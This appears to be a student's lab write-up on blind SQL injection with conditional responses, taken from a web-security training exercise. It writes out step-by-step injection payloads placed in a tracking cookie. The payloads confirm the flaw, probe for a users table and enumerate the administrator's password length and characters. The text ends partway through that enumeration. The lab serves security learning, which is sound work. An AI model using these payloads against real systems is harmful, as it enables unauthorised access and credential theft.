5. SQL Injection - Blind SQL Injection

These SQL Injects is when query does not return results back in their HTTP responses, so UNION attacks are not useful.

Blind SQL Injections can be exploited using conditional responses.

Example, if we figure out that a website reacts a certain way when a valid cookie is sent then we can add onto the HTTP request to ask application/database True/False questions. If there are no answers to our question, then the website whatever "True" response to the valid cookie will not show. If there is an answer, then the response will show.

Using "and" on the "WHERE" clause to add our additional conditional request.

Lab 11 - Blind SQL injection with conditional responses
Vulnerable parameter - tracking cookie

End Goals:
1) Enumerate the password of the administrator
2) Log in as the administrator user

1) Confirm that the parameter is vulnerable to blind SQLi
select tracking-id from tracking-table where trackingId = 'RvLfBu6s9EZRlVYN'
-> If this tracking id exists -> query returns value -> Welcome back message
-> If the tracking id doesn't exist -> query returns nothing -> no Welcome back message
select tracking-id from tracking-table where trackingId = 'RvLfBu6s9EZRlVYN' and 1=1--'
-> TRUE -> Welcome back
select tracking-id from tracking-table where trackingId = 'RvLfBu6s9EZRlVYN' and 1=0--'
-> FALSE -> no Welcome back

2) Confirm that we have a users table
select tracking-id from tracking-table where trackingId = 'RvLfBu6s9EZRlVYN' and (select 'x' from users LIMIT 1)='x'--'
-> users table exists in the database.

3) Confirm that username administrator exists users table
select tracking-id from tracking-table where trackingId = 'RvLfBu6s9EZRlVYN' and (select username from users where username='administrator')='administrator'--'
-> administrator user exists

4) Enumerate the password of the administrator user
select tracking-id from tracking-table where trackingId = 'RvLfBu6s9EZRlVYN' and (select username from users where username='administrator' and LENGTH(password)>20)='administrator'--'
-> password is exactly 20 characters
select tracking-id from tracking-table where trackingId = 'RvLfBu6s9EZRlVYN' and (select substring(password,2,1) from users where username='administrator')='a'--'
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